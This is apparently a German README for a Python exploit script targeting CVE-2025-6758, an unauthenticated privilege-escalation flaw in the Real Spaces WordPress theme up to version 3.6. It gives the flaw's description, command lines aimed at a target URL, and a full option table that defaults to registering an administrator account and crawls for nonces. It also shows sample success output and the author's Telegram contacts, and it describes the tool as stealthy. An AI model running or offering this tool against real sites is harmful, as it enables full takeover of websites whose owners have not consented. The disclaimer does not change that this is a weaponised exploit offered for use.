
Real Spaces - WordPress Properties Directory Theme <= 3.6 - Nicht authentifizierte Privilegieneskalation zum Administrator
imic_agent_registerCVE-2025-6758
CVSS-Score: 9.8 (Kritisch)
Das Real Spaces - WordPress-Theme für Immobilienverzeichnisse für WordPress ist in allen Versionen bis einschließlich 3.6 anfällig für eine Privilegieneskalation über die Funktion imic_agent_register.
Diese Schwachstelle entsteht durch unzureichende Einschränkungen bei der Rollenzuweisung während der Registrierung, wodurch nicht authentifizierte Angreifer ihre Rolle bei der Registrierung eines neuen Benutzers beliebig festlegen können, einschließlich Administrator.
Dieser kritische Fehler ermöglicht es entfernten Angreifern, vollständigen administrativen Zugriff auf WordPress-Websites zu erlangen, die anfällige Versionen des Themes ausführen, und gefährdet die Integrität und Sicherheit des betroffenen Systems.
CVE-2025-6758.py ist ein professionelles Exploit- und Automatisierungsskript, das in Python geschrieben wurde, um diese Schwachstelle zu demonstrieren und auszunutzen.
Das Skript ist für Penetrationstester und Sicherheitsforscher konzipiert und bietet automatisierte Erkennung, Nonce-Extraktion und Ausnutzung auf höchst zuverlässige, modulare und unauffällige Weise.
python3 CVE-2025-6758.py -u http://TARGET/wordpress/
--username Benutzerdefinierten Benutzernamen festlegen (Standard: Nxploited)--password Benutzerdefiniertes Passwort festlegen (Standard: 123456789)--email Benutzerdefinierte E-Mail festlegen (Standard: [email protected])--position Benutzerdefinierte Position festlegen (Standard: Nxploitedadmin)--role Benutzerrolle festlegen (Standard: administrator)--max-pages Maximale Anzahl zu durchsuchender Seiten für die Nonce-Erkennung (Standard: 30)--max-depth Maximale Link-Crawltiefe (Standard: 2)--scan-common-paths Zusätzliche Registrierungs-/Plugin-/Theme-Pfade durchsuchen--ajax-path Benutzerdefinierter AJAX-POST-Endpunkt (Standard: wp-admin/admin-ajax.php)--verify-ssl SSL-Zertifikatsprüfung aktivieren--cookie-save Pfad zum Speichern von Sitzungscookiespython3 CVE-2025-6758.py -u http://192.168.100.74:888/wordpress/ --username AdminX --password MySecretPass123 --scan-common-paths --debug
Bei erfolgreicher Ausnutzung gibt das Skript Folgendes aus:
[+] Exploitation successful.
[+] Server message: You're successfully register
[+] Username: Nxploited
[+] Password: 123456789
[+] Email: [email protected]
Wenn die Ausnutzung fehlschlägt oder die Nonce nicht gefunden wird, werden beschreibende Fehlermeldungen und Hinweise zur weiteren Fehlerbehebung angezeigt.
Dieses Skript ist ausschließlich für Bildungs-, Forschungs- und autorisierte Penetrationstestzwecke bestimmt.
Jede unbefugte Nutzung gegen Websites oder Systeme ohne ausdrückliche schriftliche Genehmigung des Eigentümers ist strengstens untersagt und kann illegal sein.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die aus der Verwendung dieses Skripts entstehen.
📧 E-Mail: [email protected]
📨 Telegram: @Kxploit
📡 Telegram-Kanal: @KNxploited
Von: Nxploited ( Khaled Alenazi )
| Argument | Standardwert | Beschreibung |
|---|
--username | Nxploited | Benutzerdefinierten Benutzernamen für die Registrierung festlegen |
--password | 123456789 | Benutzerdefiniertes Passwort für die Registrierung festlegen |
--email | [email protected] | Benutzerdefinierte E-Mail-Adresse festlegen |
--position | Nxploitedadmin | Benutzerdefinierten Positionswert festlegen |
--role | administrator | Registrierungsrolle festlegen (Administrator für die Ausnutzung empfohlen) |
--max-pages | 30 | Maximale Anzahl zu durchsuchender Seiten für die Nonce-Erkennung |
--max-depth | 2 | Maximale Link-Crawltiefe |
--scan-common-paths | None | Zusätzliche Registrierungs-/Plugin-/Theme-Pfade nach Nonce durchsuchen (nur Flag) |
--ajax-path | wp-admin/admin-ajax.php | Benutzerdefinierter AJAX-POST-Endpunkt |
--verify-ssl | None | SSL-Zertifikatsprüfung aktivieren (nur Flag) |
--cookie-save | None | Pfad zum Speichern von Sitzungscookies (Pickle-Format) |
--save-json | None | Pfad zum Speichern der Nonce-Erkennungsergebnisse als JSON |
--debug | None | Debug-Protokollierung aktivieren und HTML/JS-Ausschnitte ausgeben (nur Flag) |
--save-json Pfad zum Speichern der Nonce-Erkennungsergebnisse als JSON--debug Debug-Protokollierung aktivieren und HTML/JS-Ausschnitte ausgeben